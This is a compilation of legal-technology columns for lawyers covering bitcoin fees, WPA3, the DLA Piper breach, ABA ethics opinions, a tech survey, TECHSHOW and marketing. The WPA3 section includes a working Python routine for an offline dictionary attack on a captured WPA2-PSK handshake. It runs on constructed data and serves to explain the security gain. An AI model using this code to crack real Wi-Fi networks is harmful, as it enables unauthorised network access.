Rotunda may have a point if the client pays the lawyer in bitcoin for past legal services. In that case, the lawyer has earned the fee and bitcoin becomes the property of the lawyer. The lawyer can accept risk with respect to his or her own property. That bitcoin cannot be deposited into a bank account is not an ethics issue if the bitcoin is payment toward an earned fee. Even if the client paid the fee in cash, a lawyer cannot deposit an earned fee in a trust account because that would be commingling. The ethics rules do not require the lawyer to deposit an earned fee in an operating account either. The lawyer could deposit the cash directly into a personal checking account.

If the client gives the lawyer bitcoin as an “advance fee,” however, there are some problems. Rule 1.15 requires that a lawyer safe keep property that the client has entrusted to the lawyer. An “advanced fee” is property of the client until the lawyer has earned it. LEO 1606. If bitcoin plummets dramatically in value, and the client discharges the lawyer before the work is completed, the lawyer will not have kept safe sufficient funds or property to make a refund of the unearned fee as required by Rule 1.16(d); or, if the lawyer accepts bitcoin in settlement of a client’s claim, and the bitcoin loses value, the lawyer is unable to pay the client or to discharge third-party liens as required by Rule 1.15(b). The lawyer may discharge these obligations with other funds or property but in doing so the lawyer would be making payments “out of trust” and not in compliance with the rules.

Another problem arises out of the fact that the bar’s regulation of trust accounts and recordkeeping have not kept pace with technology and do not contemplate cryptocurrency. Lawyers are required to keep records of trust account transactions that are auditable and verified through an approved financial institution’s records and statements. No regulatory bar is currently equipped to audit Bitcoin transactions and storage.

The future

Unless some serious security measures are built into Bitcoin, we wouldn’t recommend that you invest any serious wealth with the virtual currency. Certainly, some of the other virtual currencies are better protected than others, but you still might want to think long and hard about accepting Bitcoins or other cryptocurrency as lawyers. The bulk of people we know regard bitcoins as “shady money” and they may well regard lawyers accepting Bitcoins as “shady lawyers.” Will Bitcoins be legitimized one day in the eyes of average Joes and Janes? Maybe – but not soon.

_______________

Jim McCauley is the Ethics Counsel for the Virginia State Bar where he has been employed for almost 29 years and teaches Professional Responsibility at the T.C. Williams School of Law in Richmond, Virginia. Sharon Nelson and John Simek are the President and Vice President of Sensei Enterprises, Inc., a legal technology, cybersecurity and digital forensics firm based in Fairfax, VA.

New WPA3 WiFi Standard Released


Well, it’s finally here. In the fall of 2017, a vulnerability in WPA2 wireless encryption was discovered. Known as KRACK (the key reinstallation attack), the flaw sits in the WPA2 four-way handshake itself, so it affected essentially every implementation, and manufacturers had to ship patches to fix it. The Wi-Fi Alliance has now announced the availability of the WPA3 standard (to be implemented in certified devices starting later this year). It vastly improves security over WPA2, which dates from 2004 and remains the WiFi encryption of choice until WPA3 hardware is actually in your hands. WPA3 provides a new security protocol that contains improvements in terms of configuration, authentication and encryption. Just like WPA2, WPA3 will be available in personal and enterprise versions. Some of the new features of WPA3 include:

  • Encryption of traffic on open public networks, even when no password is entered (delivered through the companion Wi-Fi Enhanced Open certification announced alongside WPA3)
  • Encryption per session
  • Protection against password-guessing attacks at the authentication level: every guess requires a live exchange with the network, so brute forcing a captured handshake offline no longer works
  • Support for using a smartphone or tablet to set up security on IoT devices
  • 192-bit security suite to protect networks with higher security requirements (e.g. governments, hospitals, etc.)

WPA3-Personal replaces the WPA2 Pre-Shared Key handshake with the “Dragonfly” Simultaneous Authentication of Equals (SAE) exchange. The password is still a secret shared by everyone on the network, but a captured SAE exchange gives an attacker nothing to test guesses against offline; every guess has to be made against the live network, one try at a time, where the access point can throttle or block repeated failures. Even though WPA3 will make connecting to public networks a lot more secure, it does not protect against rogue access points, which means the WiFi Pineapple will still be an effective penetration testing tool. What SAE will protect against is the offline dictionary attack, where the bad guys capture a single WPA2 handshake and then use cloud-based server farms to try millions of candidate passwords against it in rapid succession.

SAE also provides forward secrecy. Basically, it is an authenticated key exchange in which each session key is derived from fresh per-session values rather than from the password alone, so session keys are not compromised even if the long-term secret (the network password) is compromised later. This means that an attacker won’t be able to decrypt previously captured traffic even if they know the network’s password, which is precisely what a captured WPA2-PSK handshake plus the password allows today.
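To make concrete what SAE takes away from an attacker, here is an added example (our illustration, not code from the original post or from the Wi-Fi Alliance) of the offline dictionary attack that works against a captured WPA2-PSK four-way handshake, and of why that handshake has no forward secrecy. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed for the example; nothing here was captured from a real network. It derives the PMK from a candidate passphrase with PBKDF2, expands it to the PTK with the 802.11i PRF, and checks the EAPOL-Key MIC against the one the client sent, the same computation offline crackers perform, only far slower:

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Constructed network parameters for this example (hypothetical, not captured anywhere)
SSID = b"ExampleLawFirm"
AP_MAC = bytes.fromhex("001122334455")     # authenticator (access point) address
STA_MAC = bytes.fromhex("66778899aabb")    # supplicant (client) address
ANONCE = bytes(range(32))                  # nonce the AP sends in message 1
SNONCE = bytes(range(32, 64))              # nonce the client sends in message 2


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expand the PMK into the 64-byte PTK from both MACs and both nonces.
    Everything except the PMK travels in the clear, so a captured handshake supplies it all."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80 bytes, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC of an EAPOL-Key frame for AES/CCMP (descriptor version 2):
    HMAC-SHA1 under the KCK (first 16 bytes of the PTK), truncated to 16 bytes.
    The frame is hashed with its own MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def message2_frame() -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed, in the layout
    an attacker rebuilds from a capture: descriptor type, key info, key length, replay counter,
    SNonce, IV, RSC, ID, MIC, key-data length (no key data)."""
    body = (b"\x02"                  # descriptor type: RSN
            + b"\x01\x0a"            # key info: version 2 (AES), pairwise, MIC present
            + b"\x00\x00"            # key length
            + b"\x00" * 7 + b"\x01"  # replay counter = 1
            + SNONCE
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID
            + b"\x00" * 16           # MIC field, zeroed for the MIC computation
            + b"\x00\x00")           # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def simulate_capture(passphrase: bytes) -> Tuple[bytes, bytes]:
    """What a sniffer gets: the message-2 frame and the MIC the legitimate client computed."""
    kck = prf512(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = message2_frame()
    return frame, eapol_mic(kck, frame)


def crack_passphrase(frame: bytes, captured_mic: bytes, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: each guess is verified against captured data only.
    No packet is ever sent, so nothing on the network can throttle or detect the attempts."""
    for guess in wordlist:
        kck = prf512(pmk_from_passphrase(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    frame, mic = simulate_capture(b"winter2018")  # the firm's (weak) passphrase
    wordlist = [b"password", b"letmein", b"lawfirm", b"winter2018", b"summer2018"]
    print("recovered passphrase:", crack_passphrase(frame, mic, wordlist))
```

Every candidate is verified purely from captured bytes; the attacker never talks to the network again, which is what lets a cloud farm try millions of guesses per second. The same derivation shows why WPA2-PSK has no forward secrecy: the PTK, and so the traffic keys, depends only on the password and on values sent in the clear, so anyone holding the password and a capture can recompute it and read old traffic. Under SAE the password enters the exchange through a per-session commit that cannot be checked without the peer taking part, so there is no equivalent of this loop.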

WPA3 and the companion Enhanced Open certification help fix the security mess when connecting to public Wi-Fi networks. With Enhanced Open, traffic between your device and the Wi-Fi access point will be encrypted even if you don’t enter a password at the time of connection, so a passive attacker sitting on the same network can no longer snoop on your traffic. The caveat is that Enhanced Open authenticates nobody: an attacker who stands up a look-alike access point can still sit in the middle.

In addition to the WPA3 release, the Wi-Fi Alliance announced a new feature called Wi-Fi Easy Connect, which is a replacement for Wi-Fi Protected Setup (WPS). That’s good news since nobody should be using WPS as it is known to be insecure. One of our recommendations is to turn off WPS for all of your Wi‑Fi devices. Easy Connect will allow you to pair your router and smart device simply by scanning a QR code with your smartphone, which will automatically send the Wi-Fi credentials to the new smart device. This will make it much easier to connect IoT (Internet of Things) devices, especially those with limited or no displays.

Certified WPA3 devices should be available later this year with mass adoption expected late in 2019. When you get a WPA3-enabled router, you’ll also need WPA3-compatible client devices (e.g. phone, laptop, etc.) to take full advantage of the new features. The good news is that both WPA2 and WPA3 connections can be accepted at the same time with a new WPA3 router.

The 2017 DLA Piper Breach Revisited


It was more than a year ago that the 3,600-lawyer global megafirm DLA Piper was brought to its knees by a data breach in June of 2017. One of the questions we hear most often when we lecture is, “If DLA Piper can be breached, how do the rest of us stand a chance of preventing a data breach?”

It’s a valid question. The reaction last year varied with the size of the law firm. Larger law firms focused a lot on purchasing or increasing their cyberinsurance coverage after the DLA Piper story made the headlines. They also amped up their security measures, and pried open their wallets to create stronger defense-in-depth strategies.

The smaller firms also began spending more money on cybersecurity, many of them now awakened to the dangers of a breach. From our foxhole, small to mid-size firms particularly began to focus on employee cybersecurity awareness training, newly aware that their greatest asset (their employees) is also their greatest risk. Since 2017, cybersecurity awareness training has been the CLE that we have most often been asked to present.

Employee training is extraordinarily helpful since phishing emails present one of the greatest dangers to law firms – and these emails are becoming increasingly sophisticated as the bad guys hire native English‑speakers to help craft the emails. They also do more research and even perform advanced reconnaissance. As an example, they may know that the managing partners “Andrew Jones” or “Jillian Smith” sign their emails as “Andy” or “Jill.” Much information is publicly available via law firm sites, social media sites or press releases. We make it easy to devise inviting phishing emails.

It is hard to imagine how horrified DLA Piper’s lawyers must have been when the attack came. A sign greeting DLA Piper’s Washington employees on June 27, 2017 said, “ATTENTION DLA EMPLOYEES – All network services are down. Do NOT turn on your computers. Please remove all laptops from docking stations & keep turned off. *No exceptions.*” Not the usual greeting when you come to work, is it?

The cyber attack took down the firm’s phone systems and most of its computer networks, though some systems were shut down as a preventative measure. Two weeks after the attack, the firm issued a statement indicating that some systems were still being restored.

In a world in which large law firms are mostly paperless, the managing partner of DLA’s D.C. and Northern Virginia offices indicated that the firm had re-established the old practice of having paper copies of phone numbers and other necessary information needed to keep the firm functioning in the event of another cyber crisis. That manager, Jeff Lehrer, said that the firm has made a lot of improvements to its infrastructure.

He also indicated that the original attack was against Ukraine, where DLA Piper has an office. The person who presumably clicked on something malicious did so because of an update to accounting software unique to Ukraine (and needed for tax filings). That person was an administrator with administrative privileges, which aided in the spread of the attack.

The malware, which falsely presented as ransomware at the outset of the attack, was later identified as “NotPetya” which destroys data, though presumably DLA Piper had good backups in place as it reported that no data was lost.

All in all, we talk to audiences about DLA Piper’s measured handling of a dramatic event. Two public statements were issued, but there was otherwise not a lot of reliable information and even the press was loath to speculate overmuch. Things were much quieter than we imagined possible. It appeared to us that the law firm’s management did a pretty good job of handling a very difficult situation.

At the end of 2017, DLA even beat its own budget numbers, in spite of losing significant billable time. Hard to argue with that kind of good news – DLA Piper certainly demonstrated resilience. Was there something wrong with DLA’s cyber defenses? Undoubtedly, though no specifics were made public. And we imagine considerable time and money have been invested in remediating the specific problems uncovered and looking for and then remediating other security issues. As a side note, we still don’t understand why the email systems were down for so long and why email messages were not being delivered. Senders were getting rejection messages for sent email. Even if you host your own email servers, you should have technology in place to spool delivery and/or provide cloud access to your mailboxes should your physical server fail.

But whatever the weaknesses in DLA Piper’s defenses, it survived the crisis bloodied but still standing tall at year’s end. Other law firms watching had to be hoping that they could do as well.

Two Recent ABA Ethics Opinions: More Law Firms Relying on the Cloud


The ABA released ABA Formal Ethics Opinion 482, Ethical Obligations Related to Disasters, on September 19, 2018. The opinion may be found at https://www.americanbar.org/content/dam/aba/administrative/professional_responsibility/aba_formal_opinion_482.authcheckdam.pdf. In the opinion, the Standing Committee on Ethics and Professional Responsibility clarifies the ethical obligations attorneys face when disaster strikes.

Lawyers must follow the duty of communication required by Rule 1.4 of the ABA Model Rules of Professional Conduct, which requires lawyers to communicate regularly with clients and to keep clients reasonably apprised of their cases. Following a disaster, a lawyer must evaluate available methods to maintain communication with clients. The opinion instructs that lawyers should keep electronic lists of current clients in a manner that is “easily accessible.” Most lawyers have taken that to mean that the lists should be stored in the cloud so they can access them from an internet connection anywhere.

Lawyers should pay attention to the duty of competency, Rule 1.1, which includes a technology clause that requires lawyers to consider the benefits and risks of relevant technology. Because a disaster can destroy lawyers’ paper files, lawyers “must evaluate in advance storing files electronically” so that they can access those files after a disaster. Storing client files through cloud technology requires lawyers to consider confidentiality obligations. Again, the opinion has been read by lawyers to encourage cloud storage.

With a little due diligence, this should not present much of a problem. We constantly encourage lawyers to keep backups in the cloud. It is prudent to have a local backup, but the cloud provides additional security. As we learned from Katrina, having a backup at the office and one at home a mile away is not sufficiently protecting confidential data.

If a disaster causes the loss of client files, lawyers must also consider their ethical obligations under Rule 1.15, which requires lawyers to safeguard client property. For current clients, lawyers can first attempt to reconstruct files by obtaining documents from other sources. If they cannot, lawyers must notify the clients of the loss of files or property. To prevent such losses, “lawyers should maintain an electronic copy of important documents in an off-site location that is updated regularly.” Yup, we’re back to the cloud again.

A disaster could impact financial institutions and, therefore, client funds. Thus, lawyers “must take reasonable steps in the event of a disaster to ensure access to funds the lawyer is holding in trust.” It struck us that this could be highly problematic in some circumstances, but of course it is wise to do whatever one can.

A disaster may cause an attorney to have to withdraw from a client’s case under Rule 1.16. “In determining whether withdrawal is required, lawyers must assess whether the client needs immediate legal services that the lawyer will be unable to timely provide,” the opinion notes. We certainly saw a lot of withdrawals after Katrina. Entire law practices closed their doors, some forever.

The opinion also warns lawyers that they should not take advantage of disaster victims for personal gain: “Of particular concern is the possibility of improper solicitation in the wake of a disaster.” Ambulance chasers, hurricane and flooding chasers – all distasteful, but they’ve been with us for a long time.

On balance, the opinion provides some good guidance and may help lawyers to form an incident response plan that complies with the guidance of this opinion. It’s worth taking a look at your incident response plan to see if modifications are warranted. And if you don’t have a formal incident response plan, this is a good time to formulate one! At a recent CLE with some 40+ attendees, only a single attendee had a written incident response plan. We need to do better than that – put that high on your agenda for 2019.

On October 17, 2018, the ABA issued Formal Opinion 483, Lawyers’ Obligations After an Electronic Data Breach or Cyberattack, which may be found at https://www.americanbar.org/content/dam/aba/administrative/professional_responsibility/aba_formal_op_483.pdf.

This opinion builds on the standing committee’s Formal Opinion 477R released in May 2017, which set forth a lawyer’s ethical obligation to secure protected client information when communicating digitally.

The new opinion states: “When a breach of protected client information is either suspected or detected, Rule 1.1 requires that the lawyer act reasonably and promptly to stop the breach and mitigate damage resulting from the breach.”

The ethics opinion implicates Model Rule 1.1 (competence), Model Rule 1.4 (communications), Model Rule 1.6 (confidentiality of information), Model Rule 1.15 (safekeeping property), Model Rule 5.1 (responsibilities of a partner or supervisory lawyer) and Model Rule 5.3 (responsibilities regarding nonlawyer assistance).

There is a “rule of reason” overtone to the opinion, which states, “As a matter of preparation and best practices, however, lawyers should consider proactively developing an incident response plan with specific plans and procedures for responding to a data breach. The decision whether to adopt a plan, the content of any plan and actions taken to train and prepare for implementation of the plan should be made before a lawyer is swept up in an actual breach.”

This is of course what cybersecurity experts have said for a very long time – and, in our experience, all large firms tend to have an incident response plan. The smaller firms? Not so much.

The opinion also recommends, in a footnote, that firms should have data retention policies that limit their possession of personally identifiable information. We certainly agree with that. Lots of firms have “zombie” data – data they don’t know they have until there is a data breach.

Since data breaches cannot entirely be avoided, the opinion says, “When they do (have a breach), they have a duty to notify clients of the data breach under Model Rule 1.4 in sufficient detail to keep clients ‘reasonably informed’ and with an explanation ‘to the extent necessary to permit the client to make informed decisions regarding the representation.”

In general, when it comes to solo/small/midsize firms, virtually all experts agree that the cloud will protect confidential data better than law firms will. Their security expertise far exceeds that of the average law firm, their IT employees or their outside consultants. What questions to ask your cloud provider is the subject of a separate article. Maybe next time!

Taken together, the two opinions offer sound guidance – but it was particularly interesting to see what seems to be an increasing endorsement of cloud computing in Formal Ethics Opinion 482 as part of the solution to business continuity and the protection of confidential data.

2018 ABA Legal Technology Survey Highlights


Every year the American Bar Association sends out a survey to tens of thousands of attorneys requesting information about several areas. The 2018 survey contained six questionnaires covering the following:

  1. Technology Basics & Security
  2. Law Office Technology
  3. Online Research
  4. Marketing & Communication Technology
  5. Litigation Technology & E-Discovery
  6. Mobile Lawyers

The complete survey is available for purchase from the ABA at https://www.americanbar.org/products/ecd/ebk/350226911/. It’s not cheap, but packed with useful information. We’ll cover a few of the highlights here. Each volume is available separately, but you’ll need the complete publication to appreciate all the technology that lawyers use and the trends for the legal profession.

Cyber Liability Insurance

It seems like we hear about data breaches on a weekly basis. Certainly, protecting against security incidents is moving up on the priority list for many attorneys. As a result, lawyers obtaining cyber liability insurance is on the rise. The survey reports that 34% of respondents now have cyber liability insurance compared to 26% in 2017 and 17% in 2016.

Technology Budget

The survey asked if the technology budget has increased this year over the prior year. 45.1% said the budget did increase and 32.5% stated that the technology budget stayed the same. Only 3.7% said the budget decreased. It is not surprising that the response varied based upon the size of firm. 35.4% of solo attorneys had a budget increase. 38.6% of firms with 2-9 attorneys saw an increase and 47.5% of firms with 10-49 attorneys increased their technology budget. The largest group of attorneys to increase their technology spend occurred in the 50-99 lawyer firms, where 60% of firms increased the technology budget.

Cloud Computing

We have seen a tremendous increase in lawyers using the cloud. Being faced with the decision of replacing a server or moving to the cloud, many firms are going with the cloud option. Our experience has shown that Office 365 is a big enticement in pushing law firms to the cloud. The Legal Technology Survey reports that over half (55%) of respondents are using cloud computing technology. The smaller firms appear to have a higher adoption rate than the larger firms. 59% of solo responders are using the cloud, followed by 58% of firms with 2-9 attorneys.

The survey identifies the top used cloud services as Dropbox (60%), Google Docs (36%), iCloud (22%), Evernote (14%), and Box (14%). When asked about the most important benefits to using the cloud, respondents answered with the following:

  • Easy browser access from anywhere – 68%
  • 24×7 availability – 59%
  • Low cost of entry and predictable monthly expense – 48%
  • Robust data backup and recovery – 46%
  • Quick to get up and running – 40%
  • Eliminates IT & software management requirements – 34%
  • Better security than I can provide in-office – 31%
  • None – 8%

Observations

Clearly the movement to cloud-based solutions is continuing to rise. More and more attorneys are comfortable with cloud solutions, which has the tendency to make them more mobile. Concern about cybersecurity and protecting client confidential data are also key concerns of today’s practicing lawyers. You may not be able to afford the complete volumes of the 2018 Legal Technology Survey, but consider obtaining at least one of the volumes. It will help you see what other attorneys in similar sized firms are using, which can make you much more successful in your technology decisions.

ABA TECHSHOW 2019


As we write this, we are a week out from ABA TECHSHOW 2019, which author Simek had the honor of co-chairing along with our longtime friend Lincoln Mead.

There was a lot of conversation before, during and after TECHSHOW about the future of legal tech conferences, especially ABA TECHSHOW itself. Before the conference began, our friends Tom Mighell and Dennis Kennedy recorded a Legal Talk Network podcast on-site on the TECHSHOW EXPO floor discussing the future of legal tech conferences. You may listen to the podcast here.

During the conference, we talked at length with other members of the faculty, attendees and exhibitors about the future of ABA TECHSHOW.

After the conference, Bob Ambrogi wrote a thoughtful piece in Above the Law entitled “After 33 Years, The ABA TECHSHOW Remains Relevant and Essential”.

Let’s start with the Legal Talk Network podcast. Tom and Dennis attend a lot of conferences and noted that conferences should regularly try new things. Some conferences are responding to the desire for lower cost education by doing them online, but, as Dennis noted, you risk losing the attention of attendees who are at work and apt to be answering emails and doing other work while theoretically attending. He likes the idea of video conferences and collaborating with colleagues.

Brand new conferences have to struggle to get traction. Happily, that wasn’t a problem for TECHSHOW. After 33 years, TECHSHOW has an enviable brand.

Many conferences these days seem focused on innovation, but as Tom points out, there are always lawyers who need training in the fundamentals of using Microsoft Word and other core software applications. They are not yet thinking about artificial intelligence or blockchain and the practice of law. But of course some people are more advanced and want different conference sessions so TECHSHOW had to present a lot of diverse offerings.

Let’s face it, the large firms are primarily focused on LegalWeek. There you find the vendors who cater to large firms. Smaller firm lawyers stopped going to LegalWeek because it didn’t feel like “their place.” It was seen more as a networking event for the larger firms. Besides, New York is really expensive for solo/small firm lawyers.

ILTA is a terrific conference, but more geared to the technical folks in law firms than the practicing lawyers.

TECHSHOW educates on practical legal technology but also focuses on the future of law practice. Every year, it works to stay relevant and hip, targeting different audiences and the ever-changing needs of lawyers. As an example, Wellness and Future Proofing tracks made an appearance this year.

Though both Tom and Dennis like conferences where there is a lot of interaction, they acknowledge that they tend to be smaller conferences. Big conferences, by necessity, have to stay at a fairly high level. There is no way you can become an expert in blockchain in one hour, but you may absorb the basics and be able to follow up on more specifics post-conference through reading, webinars, etc.

As Tom notes, you’ll never satisfy 100% of the people, which is why the TECHSHOW Planning Board pays careful attention to evaluations to see which subjects, speakers and events resonated with the audience.

Without question, TECHSHOW attendees struggle with so many educational tracks, often finding that there are multiple sessions at the same time that they wish they could attend. That’s a good problem to have in many ways. You get the written materials and the PowerPoints for every session and you can look for webinars after the conference if you want to pursue a particular topic.

Sometimes, TECHSHOW doesn’t ask for CLE credit for a session but finds that there is good attendance anyway because the topic is so compelling. TECHSHOW has experimented with communities of lawyers in the same area of practice or interested in particular legal tech topics, which offers more in the way of networking opportunities. Its Academic Track has recently grown very popular. Attracting attendees from additional diverse areas of law (e.g. law students and educators) was a conscious decision of the Planning Board, which this year doubled the Academic Track to a full two days.

As a large conference, TECHSHOW works to make sure there are social events to meet people, including receptions, Taste of TECHSHOW dinners, Yoga, a 5K run and other social events. It now has Start-up Alley showcasing new legal tech products and services (hat tip to Bob Ambrogi for moderating the opening-night startup pitch competition). It has the Law Practice book booth. The EXPO Hall is an education in and of itself. TECHSHOW is famous for its open and inviting speakers – faculty members are well known for being receptive to conversations outside of sessions. And we have the “On the Road” podcast reporting from Legal Talk Network available during and after the conference, another fantastic addition to traditional conference education.

As Bob Ambrogi noted in his article, TECHSHOW’s challenge is to attract savvy legal tech lawyers who are chasing the future as well as newbies who need rudimentary technology training – and everyone in between. It certainly pleased us that Bob thought that TECHSHOW achieved the right balance this year.

Cost is always a consideration when planning a conference. Striking a balance of delivering relevant quality content for an affordable price to attendees is always on the minds of conference planners. TECHSHOW couldn’t achieve such success without the sponsorship and participation of all the vendors. This year there were 75 first time vendors to TECHSHOW and the EXPO continues to expand each year.

Of course, one of our favorite parts of TECHSHOW is that we get to visit with so many of our Canadian friends – and we’re always happy to make more Canadian friends – so mark your calendars for ABA TECHSHOW 2020 on February 26-29!


Making It Rain: Effective Lawyer Marketing in the Digital Era


“We don’t believe in digital marketing. We believe in marketing in a digital world.” – Clive Sirkin, CMO of Kimberly Clark

And a digital world it is. We live in a world where three-year-olds have their own tablets (and operate them quite expertly, thank you very much) and people can work on a project across the globe from their kitchen table in their pajamas. While it is an exciting time, it is also a very challenging time to reach people and to stand out effectively in the crowd. Understanding Mr. Sirkin’s quote is a great first step. The basics of marketing have not changed (networking, creating/maintaining client relationships, word of mouth, etc.), but the world in which we market has. It’s a fast-paced, ever-evolving digital world and lawyers must stay vigilant, educated, creative, and honest to stay in the game.

The Basics

At the very least, every lawyer and firm should have a website and email address. And NOT an AOL or Gmail address. These days, you must have an email address with your own domain to appear credible to potential clients. The website should look professional (no cheesy clip art, no gavels or scales of justice) and give clear information on who you are and what you do. It should also have an easy way to contact you. There are tons of options for website hosts these days that are affordable and user-friendly, so there really is no excuse for firms not to have one.

While a website is a basic step, it is an imperative one. Your website will serve as your cornerstone in the digital world. It will either be the first thing potential clients will see as they search for a service online or it will be where they come back to after seeing something on social media (yes, we will get to that). Your website can make or break the transition from potential client to actual client. If you don’t know about Search Engine Optimization (SEO), you have two choices – hire someone who does or invest a good chunk of time to bring yourself up to speed.

Social Media

Now we enter the overwhelming world of social media. There are so many different social media sites to choose from and they all have different layouts, themes, focuses, etc. One commonality is that they are an essential tool for marketing in a digital world. You as a lawyer and/or your firm (preferably both) need to be on social media. You can make a personal and company page on most social media sites and it’s highly recommended that you do so (if you have not already). Your presence on these sites will increase your digital footprint and allow for more opportunities for a potential client to contact you and your firm.

With all of the choices out there, it is important to find the right venues for you and your firm. Instagram is all about pictures, YouTube is all videos, LinkedIn is heavily focused on professional connections, Twitter is lightning speed news and information sharing, while Facebook is all of the above. These are all great places for potential clients to get a first glimpse, not to mention see reviews, read conversations and articles you post, and get to know you. However, whichever sites you choose, you must have a plan to stay active on those accounts. Be sure to share your own material, but also interact with others by commenting, liking, sharing/retweeting, and tagging. Having a page (or multiple pages) is great, but you must be an active participant for this effort to be effective. Perhaps dedicate a small portion of your day, 20 minutes or so, to this form of marketing.

Remember, quality over quantity is key. While posting more frequently can help to get your firm more “hits”, these hits don’t usually convert to leads or business all that often. It’s the quality of a post or content that will take your efforts further and convince people to share your work or contact your firm. This also holds true for the number of followers you have. It’s easy to be discouraged if you only have a few hundred followers while other firms or businesses have thousands. Keep in mind, users can buy followers or many of those followers could be bots or inactive accounts. If you are having great conversations and making new contacts on your social media sites, then you are doing quality work.

If you are a solo lawyer or small firm worried about having the time to do this, there are social media managers out there like Hootsuite or Buffer. However, these are frowned upon by marketing experts since these managers cannot customize posts for each platform (they are not human). These managers also cannot converse with followers or share posts, which are important elements of a successful social media presence. But for a lawyer in a pinch, social media managers as a digital tool can be very helpful. Wait, did someone say digital tool?

Digital Tools

So you have your website, email, and you are on social media. Now what? All of these steps will help your organic reach in the digital world, but if you want to increase your reach and up your SEO there are tools out there to help. The list of options is long, so here are just a few top contenders for you to consider.

First, videos are arguably the most popular form of content online right now. While an adorable dog howling “I love you” may be what you are thinking of, lawyers can use videos too in order to set themselves apart. For instance, videos are a great way to newsjack. Newsjacking is “the practice of taking advantage of current events or news stories in such a way as to promote or advertise one’s product or brand.” Many times, news stories are lacking the legal perspective of a situation, so if you can be the person to give it, you can attract great attention. You could do this in blogs or articles as well, but videos are a great way to get news out there quickly. You could use FB live, Periscope (Twitter), Instagram Stories, YouTube, etc. to do these videos. Newsjacking is just one example of effectively using videos, but there are many others. How-to videos, newsletter videos, customer references, and short, concise interviews can be beneficial as well.

Next, we’ve all heard the phrase “there’s an app for that” and well, it’s true. All of the above-mentioned social media and video streaming options are themselves apps or they have apps. There are scheduling apps, fitness apps, note-taking apps, communication apps, weather apps… you get the idea. The list is endless. Some law firms have created and customized their own apps. Now that is a little extreme, and beyond the financial reach of most small firms, but it gives you an idea of the possibilities. Just as with social media, you need to find the apps that work for you and your firm. Want to make your photos look nicer? Get a photo editor app. Need to organize your contacts and leads better? Download an app for that. Just make sure the apps you want are made by reputable companies and have good reviews before you download them. If you end up downloading an app that your phone or computer software then identifies as a “low reputation” app, uninstall it and look again!

Last but not least are online advertisements. The days of billboards and park bench signs are dwindling. Today, you can run ads on Google, any social media venue, blogs, news sites, etc. You can customize these ads to target certain keyword searches or audience demographics. Facebook even has a specific “lead generator” ad you can run. Now lawyers may see dollar signs when they hear the word “advertisement”, but online ads don’t necessarily have to be expensive. Of course, the more money you can spend on them, the better, but you can still push out a great ad and not break the bank. It may take a little time to find the most beneficial venue and advertisement for your firm, but your time will be well invested.

Test, Track, Analyze

None of the above-mentioned techniques or venues are worth anything unless you test, track, and analyze your marketing efforts. Testing, tracking and analyzing results is marketing 101 and as we established at the beginning of this article, we still need to implement basic marketing strategies… we are just doing it in a digital era now.

Luckily, tracking is fairly easy these days thanks to tools like Google Analytics. You can track all the activity on your website – where did a user come from? Which page(s) did they visit? How long did they stay? Every social media site has an “Analytics” tab or section for you to view how well posts performed, how many “likes” you received, how many new followers you gained, etc. Any ad you run online should have a report to access at the end of your campaign. So the “how” is easy, but the difficult part is the “doing.” Lawyers must track these results in order to see what is working and what may need to be improved or stopped. Without this critical step, all of your marketing efforts are for naught because you are not measuring your return on investment (ROI) with respect to both money and time.

It’s also important to remember that trying something new, testing it out, tracking and analyzing it to conclude that it does/did not work does not mean it is a complete failure. In the legal world, where lawyers either win or lose cases and have definitive lines of success versus failure, it’s easy for them to feel defeated when something does not work out exactly as they were hoping. Mistakes are learning tools. You know that test did not work, so move on and tweak it or try something new. “Rome wasn’t built in a day” and neither was any effective marketing strategy!

Human Connection

If there is one point you take away from this article, let it be this… humans need human connection. The most effective marketing strategies in the digital era will involve strong human connections. In a world where everything is becoming more and more automated and digital, these primal connections will become increasingly important.

So what does this mean for lawyers and marketing? Let people know why you are practicing law. What drives you? Show your human side on social media – do you have hobbies? Favorite recipes you can share? Are you a member of charitable organizations? There are so many different ways you can reach people and make connections by just being you. As in all things digital, be careful not to overshare – common sense will guide you.

Where does honesty come into play? Do not push a persona that is not you because you think it is more marketable. You need to be able to live up to the expectations you set online. Being someone’s lawyer is both a professional and a personal relationship, so why not give potential clients a preview of who they are hiring? And never forsake any connection, unless they prove problematic in some way. You may connect with someone who does not need a lawyer at the time, but that may change or they may end up recommending you to a friend who needs legal assistance. Jayson Gaignard, a Canadian entrepreneur & networking specialist said, “…in today’s day and age we are drowning in contacts, but we are starving for connection.” If you can build that bridge from contact to connection, you will foster and maintain very meaningful and beneficial relationships for you and your practice.

What Works for Us?

As stated previously, finding what marketing efforts work for your law practice will take some trial and error. We have been at this a while now and while we are not a law firm, our findings and best practices could be beneficial to lawyers and law firms. One of our most popular marketing and networking items is Sensei Sherlock. He is a stuffed Scooby Doo (dressed as Sherlock Holmes) that we take with us when we give presentations or travel for work. We take pictures of him at various events and with various people. Then we post these pictures on our social media accounts and on our website. We make sure to tag the person/people in the photo and/or link to their company/firm. We have had great networking and human connection successes from this! People eagerly request to have their picture taken with him now.

